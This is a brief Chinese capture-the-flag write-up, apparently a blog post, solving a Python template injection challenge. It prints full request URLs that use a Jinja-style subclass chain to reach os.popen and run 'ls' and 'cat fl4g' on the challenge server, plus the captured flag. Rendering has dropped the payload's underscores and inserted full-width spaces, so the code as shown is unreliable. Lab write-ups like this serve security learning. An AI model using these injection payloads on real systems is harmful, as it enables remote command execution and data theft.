攻防世界web进阶区之Web_python_template_injection

点开题目所给链接:攻防世界web进阶区之Web_python_template_injection_第1张图片我们通过 { {1+1}} 判断了它存在phthon模块注入:攻防世界web进阶区之Web_python_template_injection_第2张图片通过 http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()%7D%7D访问所有模块。
我们可以借用 os.popen来读取我们想要的flag文件里的信息
构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘os’].popen(‘ls’).read()%7D%7D在这里插入图片描述可发现我们要的flag就在fl4g里,我们查看这个文件即可,构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘os’].popen(‘cat%20fl4g’).read()%7D%7D在这里插入图片描述得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

你可能感兴趣的:(web,web,python)